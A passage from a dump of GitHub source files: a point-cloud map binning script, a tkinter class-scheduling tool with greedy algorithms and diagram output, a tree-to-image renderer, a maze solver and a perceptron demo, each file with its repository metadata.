pcd...\\n\" + f + \"\\n\"\n pc = pypcd.PointCloud.from_path(f)\n global_map = pc.pc_data\n # print datetime.datetime.now() - start\n\n '''\n txtfile = os.path.join(FindPath, f[:-4] + \".txt\")\n mat_list = []\n with open(txtfile) as infile:\n for line in infile:\n fields = line.split()\n mat_list.extend(map(float, fields))\n '''\n # print \"Dumping...\\n\"\n for point in global_map:\n '''\n sin2 = math.sin(mat_list[2])\n cos2 = math.cos(mat_list[2])\n sin1 = math.sin(mat_list[1])\n cos1 = math.cos(mat_list[1])\n sin0 = math.sin(mat_list[0])\n cos0 = math.cos(mat_list[0])\n x1 = cos2 * point[0] - sin2 * point[1]\n y1 = sin2 * point[0] + cos2 * point[1]\n z1 = point[2]\n\n x2 = x1\n y2 = cos0 * y1 - sin0 * z1\n z2 = sin0 * y1 + cos0 * z1\n\n t0 = cos1 * x2 + sin1 * z2 + mat_list[3]\n t1 = y2 + mat_list[4]\n t2 = -sin1 * x2 + math.cos(mat_list[1]) * z2 + mat_list[5]\n t3 = point[3]\n '''\n x_block = int(np.round(point[0]/block_size))*block_size\n z_block = int(np.round(point[2]/block_size))*block_size\n block_tuple = (x_block, z_block)\n point_to_block.setdefault(block_tuple, []).append((point[0], point[2], point[1], point[3]))\n # point_to_block: block->(x,z,y)\n\n print \"Writing...\\n\"\n destination_folder = \"/mnt/truenas/scratch/genmao/one_map_files/\"\n block_start = 0\n block_index = []\n if not os.path.exists(destination_folder):\n os.makedirs(destination_folder)\n blockfilename = destination_folder + \"map1492801000.06.txt\"\n with open(blockfilename, 'ab') as outfile:\n for cell in point_to_block:\n # flatten = [item for sublist in point_to_block[cell] for item in sublist]\n print block_start\n block_index.append((cell[0], cell[1], block_start, block_start + len(point_to_block[cell])))\n block_start += len(point_to_block[cell])\n write_records(point_to_block[cell], '<dddd', outfile)\n block_indexfile = destination_folder + \"idx1492801000.06.txt\"\n with open(block_indexfile, 'wb') as outfile:\n write_records(block_index, '<dddd', outfile)\n print datetime.datetime.now() - start\n\n\nif __name__ == \"__main__\":\n FindPath = \"/mnt/truenas/scratch/yiluo/ToGenmao/1492801000.06/mappoints\"\n FileList = []\n FileNames = os.listdir(FindPath)\n if len(FileNames) > 0:\n for f in FileNames:\n if os.path.splitext(f)[-1] == \".pcd\":\n pcdfile = os.path.join(FindPath, f)\n FileList.append(pcdfile)\n load_global_map(FileList)\n # pcdfile = '/home/genmaoshi/Downloads/data_sample/1486176044.29.pcd'\n # pcdfile = '/home/genmaoshi/Downloads/data_sample/part.pcd'\n\n"
}
] | 3 |
TheLostLight/Simple-Scheduler | https://github.com/TheLostLight/Simple-Scheduler | a0854aed9364c9848ae68cd902fa238f48b0e0a6 | feeea1a37715ccfe62a3ca84a7b972434a35a1fd | cc7a7f35dbb0ab64ef68af8c3e6f84f0dcd7c20a | refs/heads/master | 2023-03-29T23:37:51.236124 | 2021-04-10T03:43:00 | 2021-04-10T03:43:00 | 356,461,942 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6098200678825378,
"alphanum_fraction": 0.6146926283836365,
"avg_line_length": 34.560001373291016,
"blob_id": "14ce0833cd61e654ac1f4d368568ab6ece7eb0f4",
"content_id": "99d4e0509dfba0b1d6ecd2f50afe274ec2276588",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2668,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 75,
"path": "/src/scheduler.py",
"repo_name": "TheLostLight/Simple-Scheduler",
"src_encoding": "UTF-8",
"text": "# Takes a list of classes (tuple of two ints) \n# sorted by starting time (ascending).\n# Then fills up classrooms one by one,\n# iterating over the list and removing \n# classes each time they are assigned a classroom\ndef matt_algorithm(class_list):\n classrooms = list()\n minimum_classrooms = 0\n\n while(class_list):\n\n # Unecessary variable, but makes code easier to read\n # (Probably removed by optimizer)\n minimum_classrooms += 1\n\n # Keeps track of index in list of classrooms\n m = minimum_classrooms-1\n\n # Create a new classroom, append first element in the list to it as a list.\n classrooms.append([class_list[0]])\n\n # Temporary list to keep track of unassigned classes.\n temp_list = list()\n\n # Go through all unassigned classes. If they fit into\n # current classroom, add them. Otherwise, add to temp list\n for i in range(1, len(class_list)):\n \n # Change to '>=' if class start times and end times should overlap\n if class_list[i][0] > classrooms[m][-1][1]:\n classrooms[m].append(class_list[i])\n else:\n temp_list.append(class_list[i])\n\n class_list = temp_list.copy()\n\n # Schedule has been made with minimum number of classrooms.\n return classrooms\n\n#Takes a list of classes (tuple of two ints) and\n# treats it as a stack. Sorted by start times\n# (descending as a list, earliest time first out).\n# Sorts each class into the first available classroom one by one.\n# Returns a list of classrooms with their scheduled classes\ndef greedy_algorithm(class_stack):\n classrooms = list()\n\n # Pop elements from stack one by one and find a classroom\n # in which it has no time conflicts\n while(class_stack):\n current_class = class_stack.pop()\n\n # Index to track the next unchecked classroom\n index = 0\n\n # First check if the classroom exists. If not, make it.\n # If it does check if there is no time conflict.\n # If not, add current_class to the classroom.\n # Otherwise, increment the index.\n while(True):\n if index >= len(classrooms):\n classrooms.append([current_class])\n break\n else:\n # Change to '>=' if class start times and end times should overlap \n if current_class[0] > classrooms[index][-1][1]:\n classrooms[index].append(current_class)\n break\n else:\n index += 1\n #End of inner loop\n #End of outer loop\n\n #Schedule has been created. \n return classrooms\n\n"
},
{
"alpha_fraction": 0.5942028760910034,
"alphanum_fraction": 0.5942028760910034,
"avg_line_length": 16.5,
"blob_id": "74ea8bce810a2c7debfb23b2b9fc7bf2c07375c7",
"content_id": "d2533b11d2cc51e43f194e5738a94f7dfd0e95f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 69,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 4,
"path": "/src/main.py",
"repo_name": "TheLostLight/Simple-Scheduler",
"src_encoding": "UTF-8",
"text": "from gui import createGUI\n\nif __name__ == '__main__':\n createGUI()"
},
{
"alpha_fraction": 0.6428571343421936,
"alphanum_fraction": 0.6543778777122498,
"avg_line_length": 26.1875,
"blob_id": "ec49d382431cf8994fae1bcf9f7b435ff6a1b729",
"content_id": "1f9879b5fe8a3098be50c09553ccade19806b4e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 434,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 16,
"path": "/src/test.py",
"repo_name": "TheLostLight/Simple-Scheduler",
"src_encoding": "UTF-8",
"text": "import scheduler\nfrom filereader import getDataset\n\nclasses = getDataset(\"test.txt\")\n\n#classes.sort()\nclasses.sort(reverse=True)\n\n#classrooms = scheduler.matt_algorithm(classes)\nclassrooms = scheduler.greedy_algorithm(classes.copy())\n\nfor i in range(0, len(classrooms)):\n print(\"Classroom \" + str(i+1) + \":\")\n\n for c in classrooms[i]:\n print(\"Class \" + str(classes.index(c)+1) + \": (\" + str(c[0]) + \"-\" + str(c[1]) + \")\")"
},
{
"alpha_fraction": 0.8062015771865845,
"alphanum_fraction": 0.8062015771865845,
"avg_line_length": 25,
"blob_id": "bd49208151aff3849653a9ea5818d279072cc232",
"content_id": "ee0fc4fa0c8775270465616d9442fbc6c1d82aec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 5,
"path": "/README.md",
"repo_name": "TheLostLight/Simple-Scheduler",
"src_encoding": "UTF-8",
"text": "# Simple Scheduler\n\nSchedules a list of classes into the minimum number of classrooms.\n\nCan create diagrams and save them to file"
},
{
"alpha_fraction": 0.6003717184066772,
"alphanum_fraction": 0.6115241646766663,
"avg_line_length": 27.36842155456543,
"blob_id": "646b83cb2141782d7bab0d76490db6d54d41e9f7",
"content_id": "669586e68a500ab361a435f4d171e971a841f510",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 538,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 19,
"path": "/src/filereader.py",
"repo_name": "TheLostLight/Simple-Scheduler",
"src_encoding": "UTF-8",
"text": "import re\n\n# Take an input file and return a list of tuples of two ints\n# (starting time and ending time).\ndef getDataset(file_name):\n with open(file_name, \"r\") as file:\n \n input_text = file.read()\n values = [int(num) for num in re.findall(\"[0-9]+\", input_text)]\n\n if(len(values) < 2):\n raise Exception(\"Less than two numbers found in file.\\n Incorrect formatting.\")\n \n data_set = list()\n\n for i in range(0, len(values), 2):\n data_set.append((values[i], values[i+1]))\n\n return data_set"
},
{
"alpha_fraction": 0.6432432532310486,
"alphanum_fraction": 0.6443243026733398,
"avg_line_length": 32.04081726074219,
"blob_id": "0e3602b025c42ab5f4a7e6b5bb1e5ce8207c3aee",
"content_id": "8eabb43b55760373f00cc217d3b9fa8d77b21dc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6475,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 196,
"path": "/src/gui.py",
"repo_name": "TheLostLight/Simple-Scheduler",
"src_encoding": "UTF-8",
"text": "import tkinter\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nimport os\n\nfrom filegenerator import createExampleFile\nfrom filegenerator import saveDataToFile\nfrom filereader import getDataset\nimport scheduler\nfrom makeimage import getDiagram\n\ndef showFileDialog(top):\n top.withdraw()\n of = filedialog.askopenfilename(parent=top, initialdir=os.getcwd())\n top.deiconify()\n return of\n\ndef showFileSave(top):\n top.withdraw()\n sf = filedialog.asksaveasfilename(parent=top, initialdir=os.getcwd())\n top.deiconify()\n return sf\n\ndef isNotDigit(text):\n return text.isdigit()\n\ndef showTargetPanel(current_frame, target_frame):\n current_frame.pack_forget()\n target_frame.pack()\n\ndef saveExampleFile(top, nclass, max_n):\n \n if nclass == \"\" or max_n == \"\":\n messagebox.showerror(title=\"User error\", message=\"Please enter a number in the above fields\")\n return\n \n top.withdraw()\n save_filename = filedialog.asksaveasfilename(parent=top, title=\"Save example to txt\", initialdir=os.getcwd(), defaultextension=\".txt\")\n top.deiconify()\n\n if save_filename == '':\n return\n\n try:\n createExampleFile(save_filename, int(nclass), int(max_n))\n except TypeError:\n tkinter.messagebox.showerror(title=\"How did that happen?\", message=\"Type error. Was a non-integer entered in input fields?\")\n except IOError:\n tkinter.messagebox.showerror(title=\"IOError\", message=\"There was an error creating the file.\")\n\ndef saveToText(top, data):\n try:\n top.withdraw()\n file_name = filedialog.asksaveasfilename(parent=top, title=\"Save to text\", initialdir=os.getcwd(), defaultextension=\".txt\")\n top.deiconify()\n except IOError:\n messagebox.showerror(title=\"IOError\", message=\"There was an error opening selected file.\")\n return False\n\n if file_name == \"\":\n return False\n\n try:\n saveDataToFile(file_name, data)\n except IOError:\n messagebox.showerror(title=\"IOError\", message=\"There was an error saving results to file...\")\n return False\n except TypeError:\n messagebox.showerror(title=\"TypeError\", message=\"There was an error saving results to file...\")\n return False\n\n return True\n\ndef saveToPNG(top, data):\n try:\n top.withdraw()\n file_name = filedialog.asksaveasfilename(parent=top, title=\"Save to png\", initialdir=os.getcwd(), defaultextension=\".png\")\n top.deiconify()\n except IOError:\n messagebox.showerror(title=\"IOError\", message=\"There was an error opening selected file.\")\n return False\n\n if file_name == \"\":\n return False\n\n try:\n getDiagram(data, file_name, True)\n except IOError:\n messagebox.showerror(title=\"IOError\", message=\"There was an error saving results to file...\")\n return False\n\n return True\n\ndef saveToBoth(top, data):\n if not saveToText(top, data):\n return\n saveToPNG(top, data)\n\ndef createOutput(top, main_frame, use_matt_algo):\n try:\n file_name = showFileDialog(top)\n\n if file_name == \"\":\n return\n\n data = getDataset(file_name)\n\n if(use_matt_algo):\n data.sort()\n classrooms = scheduler.matt_algorithm(data)\n else:\n data.sort(reverse=True)\n classrooms = scheduler.greedy_algorithm(data.copy())\n \n except IOError:\n messagebox.showerror(title=\"IOError\", message=\"An error with the input file.\")\n return\n\n # Output frame\n #------------------------------------------------------------------------\n output_frame = tkinter.Frame(top)\n\n outputf_label = tkinter.Label(output_frame, text=\"Results ready!\")\n outputf_label.pack()\n\n mimage_button = tkinter.Button(output_frame, text=\"Show diagram\", command=lambda: getDiagram(classrooms, \"\", False))\n mimage_button.pack()\n\n simage_button = tkinter.Button(output_frame, text=\"Save diagram to png file\", command=lambda: saveToPNG(top, classrooms))\n simage_button.pack()\n\n stext_button = tkinter.Button(output_frame, text=\"Save raw data to txt file\", command=lambda: saveToText(top, classrooms))\n stext_button.pack()\n\n both_button = tkinter.Button(output_frame, text=\"Save raw data and diagram\", command=lambda: saveToBoth(top, classrooms))\n both_button.pack()\n\n output_return_button = tkinter.Button(output_frame, text=\"Return\", command=lambda: showTargetPanel(output_frame, main_frame))\n output_return_button.pack()\n\n showTargetPanel(main_frame, output_frame)\n \n\n\ndef createGUI():\n top = tkinter.Tk()\n top.title(\"CPSC-482 Scheduling\")\n\n\n # Main frame\n #------------------------------------------------\n main_frame = tkinter.Frame(top)\n\n generator_button = tkinter.Button(main_frame, text=\"Create new example file\", command=lambda: showTargetPanel(main_frame, example_frame))\n generator_button.pack()\n\n matt_button = tkinter.Button(main_frame, text=\"Use Matt's Algorithm\", command=lambda: createOutput(top, main_frame, True))\n matt_button.pack()\n\n greedy_button = tkinter.Button(main_frame, text=\"Use Greedy Algorithm\", command=lambda: createOutput(top, main_frame, False))\n greedy_button.pack()\n\n exit_button = tkinter.Button(main_frame, text=\"Quit\", command=top.quit)\n exit_button.pack()\n\n main_frame.pack()\n #--------------------------------------------------\n\n # Example frame\n #--------------------------------------------------\n example_frame = tkinter.Frame(top)\n vcmd = example_frame.register(isNotDigit)\n\n nclass_label = tkinter.Label(example_frame, text='Enter # of classes:')\n nclass_label.pack()\n\n class_num = tkinter.Entry(example_frame, validate='key', validatecommand=(vcmd, '%S'))\n #class_num.insert(0, \"1\")\n class_num.pack()\n\n maxn_label = tkinter.Label(example_frame, text=\"Enter maximum timeslot:\")\n maxn_label.pack()\n\n max_time = tkinter.Entry(example_frame, validate='key', validatecommand=(vcmd, '%S'))\n #max_time.insert(0, '2')\n max_time.pack()\n\n ex_save_button = tkinter.Button(example_frame, text='Save to file', command=lambda: saveExampleFile(top, class_num.get(), max_time.get()))\n ex_save_button.pack()\n\n ex_return_button = tkinter.Button(example_frame, text='Return', command=lambda: showTargetPanel(example_frame, main_frame))\n ex_return_button.pack()\n #------------------------------------------------------------------------\n\n \n top.mainloop()"
},
{
"alpha_fraction": 0.5787401795387268,
"alphanum_fraction": 0.6145669221878052,
"avg_line_length": 32,
"blob_id": "5a5ddf3fc05d852a03963eabfce3b98e773e016d",
"content_id": "fe531ff8c19c4cb40230e075b452b074079793d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2540,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 77,
"path": "/src/makeimage.py",
"repo_name": "TheLostLight/Simple-Scheduler",
"src_encoding": "UTF-8",
"text": "from PIL import Image, ImageDraw\n\nHEIGHT_PER_ROOM = 100\nNOTCH_PROTRUSION = 2\nTIME_STEP = 50\nLABEL_FLOAT = 8\nDF = '{0:2g}'\n\ndef drawClass(draw, room, x_origin, tpp, start, stop):\n\n center_y = HEIGHT_PER_ROOM*room + HEIGHT_PER_ROOM/2\n top_left = (x_origin + start/tpp, center_y-20)\n bottom_right = (x_origin + stop/tpp, center_y+20)\n center_x = (top_left[0]+bottom_right[0])/2\n\n draw.rectangle([top_left, bottom_right], fill=\"red\", outline=\"blue\")\n\n label = str(start) + \"-\" + str(stop)\n\n draw.text((center_x-(draw.textlength(label)/2), center_y-25-draw.textsize(label)[1]), label, fill=\"black\")\n\ndef createDiagram(classrooms):\n max_time = 0\n\n #Find maximum class time for scaling purposes\n for c in classrooms:\n max_time = c[-1][1] if c[-1][1] > max_time else max_time\n\n if max_time/0.01 + TIME_STEP + 10 < 2400:\n time_per_pixel = 0.01\n elif max_time/0.1 + TIME_STEP + 10 < 2400:\n time_per_pixel = 0.1\n elif max_time/0.5 + TIME_STEP + 10 < 2400:\n time_per_pixel = 0.5\n else:\n time_per_pixel = 1\n \n\n number_of_rooms = len(classrooms)\n\n result = Image.new('RGBA', (int(max_time/time_per_pixel + TIME_STEP + 10), int(HEIGHT_PER_ROOM*(number_of_rooms+1))), (0, 255, 0, 0))\n draw = ImageDraw.Draw(result)\n\n y_origin = result.size[1] + NOTCH_PROTRUSION - HEIGHT_PER_ROOM\n x_origin = 10\n\n #Draw y_axis\n draw.line([(x_origin, 0), (x_origin, y_origin)], fill=\"black\", width=2)\n #Draw x_axis\n draw.line([(x_origin, y_origin), (result.size[0]-1, y_origin)], fill=\"black\", width=2)\n cursor = x_origin\n label = 0\n while cursor < result.size[0]:\n draw.line([(cursor, y_origin-NOTCH_PROTRUSION), (cursor, y_origin+NOTCH_PROTRUSION+1)], fill=\"grey\", width=2)\n draw.text((cursor-(draw.textlength(DF.format(label))/2)+1, y_origin+LABEL_FLOAT+NOTCH_PROTRUSION), DF.format(label), fill=\"black\")\n label += TIME_STEP*time_per_pixel\n cursor += TIME_STEP\n\n\n #Draw Class labels + class times\n for i in range(0, number_of_rooms):\n text = \"Classroom \" + str(i+1)\n cursor = (result.size[0]-x_origin)/2 - draw.textlength(text)/2 + 1\n draw.text((cursor, HEIGHT_PER_ROOM*i + 1), text, fill=\"black\")\n\n for class_time in classrooms[i]:\n drawClass(draw, i, x_origin, time_per_pixel, class_time[0], class_time[1])\n\n return result\n\ndef getDiagram(data, file_name, save):\n image = createDiagram(data)\n\n if(save):\n image.save(file_name, \"PNG\")\n else:\n image.show()"
},
{
"alpha_fraction": 0.5689783692359924,
"alphanum_fraction": 0.5764355063438416,
"avg_line_length": 32.54999923706055,
"blob_id": "be00f9ab62bd23184ede35811ebfd9ead23a2561",
"content_id": "724e945395d5c508ded0b89c0abf890d0245dc45",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1341,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 40,
"path": "/src/filegenerator.py",
"repo_name": "TheLostLight/Simple-Scheduler",
"src_encoding": "UTF-8",
"text": "import random\nfrom datetime import datetime\n\n# Randomly generates an example file which can be used as\n# input in fileread.py\n# \n# file_name - Name of resulting output file\n# nclass - Number of individual class times to generate\n# max_time - The maximum latest time a class can end at\ndef createExampleFile(file_name, nclass, max_time):\n result = open(file_name, \"w\")\n\n result.write(\"Classes (start_time::end_time) : \\n\")\n\n for _ in range(0, nclass):\n start = random.randint(0, max_time-1)\n result.write(\"(\" + str(start) + \"::\" + str(random.randint(start+1, max_time)) + \")\\n\")\n\n result.close()\n\n# Saves the result of a scheduling algorithm to a text file\ndef saveDataToFile(file_name, data):\n result = open(file_name, \"w\")\n\n result.write(\"File generated \" + datetime.now().strftime(\"%B %d, %Y - %H:%M:%S\") + \"\\n\\n\")\n result.write(\"Minimum classrooms: \" + str(len(data)) + \"\\n\")\n result.write(\"---------\\n\\n\")\n\n for i in range(0, len(data)):\n result.write(\"Classroom \" + str(i+1) + \":\\n----------------\\n\")\n ind = 1\n\n for class_time in data[i]:\n result.write(\"Class \" + str(ind) + \": (\" + str(class_time[0]) + \"-\" + str(class_time[1]) + \")\\n\")\n ind += 1\n \n #result.write(\"----------------\\n\")\n result.write(\"\\n\")\n\n result.close()"
}
] | 8 |
proto3/SogiTree | https://github.com/proto3/SogiTree | a3303dead9627a82e28c8e84d2f5d7457671c4de | 6026fb8544521023da8dcfa49faa7c651d57c885 | 4b3ff601dbe0e7cbbd1f574a3ec188abacac08e0 | refs/heads/master | 2021-08-22T06:29:59.459744 | 2017-11-29T14:31:41 | 2017-11-29T14:31:41 | 112,467,130 | 0 | 0 | null | 2017-11-29T11:28:20 | 2017-11-26T22:02:11 | 2017-11-29T10:40:40 | null | [
{
"alpha_fraction": 0.43736952543258667,
"alphanum_fraction": 0.46276965737342834,
"avg_line_length": 35.846153259277344,
"blob_id": "0190bb0514a2bbaa4b510c6ec1d62579e94e041d",
"content_id": "0366ae633a54249f5f7a99a4a592b7b811c7fa3c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2874,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 78,
"path": "/scripts/tree2ppm.py",
"repo_name": "proto3/SogiTree",
"src_encoding": "UTF-8",
"text": "import sys\nimport random\nfrom PIL import Image, ImageDraw\n#from tkinter import *\n\n\nwith open(sys.argv[1], 'r') as f:\n lines = f.readlines()\n height = len(lines)\n width = len(lines[0]) - 1\n\nprint(width, height)\n\nimg = Image.new('RGBA', (width * 10, height * 10))\nd = {'f': '../textures/f',\n 'F': '../textures/F',\n 't': '../textures/t',\n 'T': '../textures/T',\n 'o': '../textures/o',\n 'r': '../textures/r',\n '-': '../textures/u',\n ' ': '../textures/a'}\n\nx = 0\ny = 0\ndraw = ImageDraw.Draw(img)\n\nworld = []\nfor line in lines:\n current_line = []\n for c in line:\n if c != '\\n':\n current_line.append(c)\n world.append(current_line)\nprint(world)\n\nfor y, line in enumerate(world):\n for x, c in enumerate(line):\n #print(line)\n #for x in range(width):\n #print(x,y)\n green = int((255.0 / height) * y)\n if c == ' ':\n draw.rectangle((x * 10, y * 10, (x+1) * 10, (y+1) * 10), (0,green,255))\n elif c != '\\n':\n ind = random.randint(1,3)\n current_sprite = Image.open(d[line[x]] + str(ind) + '.png')\n img.paste(current_sprite, (x * 10, y * 10))\n\nimg.save('res.png', 'png')\nimg.show()\n'''\n elif c == 'f':\n if x > 0 and y > 0 and x < width - 1 and y < height - 1:\n if (world[x-1][y] == ' ' and world[x][y-1] == ' ' and world[x-1][y-1] == ' '\n and world[x+1][y] == 'f' and world[x][y+1] == 'f'):\n current_sprite_i = Image.open('../textures/f_nwi.png')\n current_sprite = Image.open('../textures/f_nw.png')\n elif (world[x+1][y] == ' ' and world[x][y-1] == ' ' and world[x+1][y-1] == ' '\n and world[x-1][y] == 'f' and world[x][y+1] == 'f'):\n current_sprite_i = Image.open('../textures/f_nei.png')\n current_sprite = Image.open('../textures/f_ne.png')\n elif (world[x+1][y] == ' ' and world[x][y+1] == ' ' and world[x+1][y+1] == ' '\n and world[x-1][y] == 'f' and world[x][y-1] == 'f'):\n current_sprite_i = Image.open('../textures/f_sei.png')\n current_sprite = Image.open('../textures/f_se.png')\n elif (world[x-1][y] == ' ' and world[x-1][y-1] == ' ' and world[x][y-1] == ' '\n and world[x][y-1] == 'f' and world[x+1][y] == 'f'):\n current_sprite_i = Image.open('../textures/f_swi.png')\n current_sprite = Image.open('../textures/f_sw.png')\n else:\n current_sprite = Image.open('../textures/f.png')\n current_sprite_i = Image.open('../textures/blank.png')\n\n img.paste(current_sprite, (x * 10, y * 10))\n draw.bitmap((x * 10, y * 10), current_sprite_i, fill=(0,green,255))\n\n'''\n"
}
] | 1 |
weinanfu/Machine-Learning | https://github.com/weinanfu/Machine-Learning | 9c6900e780521e661459c522e67bde7f9233b5a2 | c9239d67a1de2fdbef6e96563cf95728d6c6b964 | df1d72e7b3b3ef07726934b863161984887e5322 | refs/heads/master | 2020-06-26T08:19:01.234835 | 2019-07-30T05:42:00 | 2019-07-30T05:42:00 | 199,582,116 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6076948642730713,
"alphanum_fraction": 0.6132851243019104,
"avg_line_length": 32.79999923706055,
"blob_id": "9379b8ddf8c763d70132351711353c3d9c8b7068",
"content_id": "af6601bd47ee4f0bbec6efb178cc32edbe1b79bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3041,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 90,
"path": "/Maze.py",
"repo_name": "weinanfu/Machine-Learning",
"src_encoding": "UTF-8",
"text": "import sys\n\nPART_OF_PATH = '+'\nTRIED = '.'\nOBSTACLE = '1'\nDEAD_END = '-'\n\nclass Maze:\n path = []\n def __init__(self, mazeFileName):\n columnsInMaze = 0\n self.mazelist = []\n mazeFile = open(mazeFileName, 'r')\n rowsInMaze = 0\n for line in mazeFile:\n rowList = []\n col = 0\n for ch in line:\n if ch == '1' or ch == '0':\n rowList.append(ch)\n col = col + 1\n rowsInMaze = rowsInMaze + 1\n self.mazelist.append(rowList)\n columnsInMaze = len(rowList)\n self.startRow, self.startCol = map(int, input(\"Start: \").split(','))\n self.endRow, self.endCol = map(int, input(\"End: \").split(','))\n if self.mazelist[self.startRow][self.startCol] == OBSTACLE or self.mazelist[self.endRow][self.endCol] == OBSTACLE:\n print(\"invalid point\")\n sys.exit()\n self.rowsInMaze = rowsInMaze\n self.columnsInMaze = columnsInMaze\n self.xTranslate = -columnsInMaze/2\n self.yTranslate = rowsInMaze/2\n\n def updatePosition(self, row, col, val=None):\n if val:\n self.mazelist[row][col] = val\n\n if val == PART_OF_PATH:\n node = []\n node.append(row)\n node.append(col)\n self.path.append(node)\n\n def returnpath(self):\n return self.path\n\n def __getitem__(self,idx):\n return self.mazelist[idx]\n\n\ndef searchFrom(maze, startRow, startColumn, endRow, endCol):\n # try each of four directions from this point until we find a way out.\n # base Case return values:\n # 1. We have run into an obstacle, return false\n maze.updatePosition(startRow, startColumn)\n if maze[startRow][startColumn] == OBSTACLE :\n return False\n # 2. We have found a square that has already been explored\n if maze[startRow][startColumn] == TRIED or maze[startRow][startColumn] == DEAD_END:\n return False\n # 3. We have found an outside edge not occupied by an obstacle\n if startRow == endRow and startColumn == endCol:\n print('Yes')\n maze.updatePosition(startRow, startColumn, PART_OF_PATH)\n return True\n maze.updatePosition(startRow, startColumn, TRIED)\n # Otherwise, use logical short circuiting to try each direction\n # in turn (if needed)\n found = searchFrom(maze, startRow-1, startColumn, endRow, endCol) or \\\n searchFrom(maze, startRow+1, startColumn, endRow, endCol) or \\\n searchFrom(maze, startRow, startColumn-1, endRow, endCol) or \\\n searchFrom(maze, startRow, startColumn+1, endRow, endCol)\n if found:\n maze.updatePosition(startRow, startColumn, PART_OF_PATH)\n\n else:\n maze.updatePosition(startRow, startColumn, DEAD_END)\n return found\n\nmyMaze = Maze('maze.txt')\n\nmyMaze.updatePosition(myMaze.startRow, myMaze.startCol)\n\nsearchFrom(myMaze, myMaze.startRow, myMaze.startCol,myMaze.endRow,myMaze.endCol)\n\na = myMaze.returnpath()\na.reverse()\nfor i in a:\n print(i)"
},
{
"alpha_fraction": 0.4983624517917633,
"alphanum_fraction": 0.5453056693077087,
"avg_line_length": 23.413333892822266,
"blob_id": "a3ec16ec5c881a98175acc57fef5e98def7be72b",
"content_id": "cd73d0deba4a9fb89522988799e4a18db81c3057",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1898,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 75,
"path": "/perceptron/Perceptron.py",
"repo_name": "weinanfu/Machine-Learning",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n\n# 感知机学习算法\ndef Percetron_Learning(X, y, learning_rate):\n m, n = X.shape\n w_record = []\n X = np.column_stack((X, np.ones(m)))\n w = np.random.random(n + 1)\n w_record.append(w.copy())\n iter = 0\n while True:\n i = np.random.randint(m)\n if y[i] * (w.dot(X[i, :])) <= 0:\n w = w + learning_rate * y[i] * X[i, :]\n w_record.append(w.copy())\n iter += 1\n print(\"第\" + str(iter) + \"次修正\")\n continue\n predict = sgn(X, w)\n if np.all(predict == y):\n break\n return w, w_record\n\n\n# 指示函数\ndef sgn(X, w):\n predict = np.dot(X, w)\n predict[predict > 0] = 1\n predict[predict < 0] = -1\n predict[predict == 0] = 0\n return predict\n\n\n# 二维测试数据生成\nmean1 = [0, 0]\ncov1 = [[1, 0], [0, 1]]\nmean2 = [3, 3]\ncov2 = [[1, 0], [0, 1]]\nX1 = np.random.multivariate_normal(mean1, cov1, 50)\nX2 = np.random.multivariate_normal(mean2, cov2, 50)\n# 绘制散点图\nplt.scatter(X1[:, 0], X1[:, 1])\nplt.scatter(X2[:, 0], X2[:, 1])\n# PLA算法求系数\nX = np.row_stack((X1, X2))\ny = np.ones(100)\ny[0:50] = -1\nw, w_record = Percetron_Learning(X, y, 0.01)\n\nfig, ax = plt.subplots()\nax.scatter(X1[:, 0], X1[:, 1])\nax.scatter(X2[:, 0], X2[:, 1])\nx = np.arange(X.min() - 1, X.max() + 1, 0.01)\nw0 = w_record[0]\nline, = ax.plot(x, (-w0[0] * x - w0[2]) / w0[1])\n\n\ndef init(): # only required for blitting to give a clean slate.\n line.set_ydata([np.nan] * len(x))\n return line,\n\n\ndef animate(i):\n if i == len(w_record):\n return\n w = w_record[i]\n line.set_ydata((-w[0] * x - w[2]) / w[1]) # update the data.\n return line,\n\n\nani = animation.FuncAnimation(fig, animate, init_func=init, interval=2, blit=True, save_count=50)\nax.plot(x, (-w[0] * x - w[2]) / w[1])\n\n"
},
{
"alpha_fraction": 0.6193236708641052,
"alphanum_fraction": 0.6318840384483337,
"avg_line_length": 26.972972869873047,
"blob_id": "dbf574fb2b242a62e25b0f5c32a0984079182060",
"content_id": "2dd072398abc9114cb487d19c69cee3cfd7c3c13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3105,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 111,
"path": "/perceptron/T.py",
"repo_name": "weinanfu/Machine-Learning",
"src_encoding": "UTF-8",
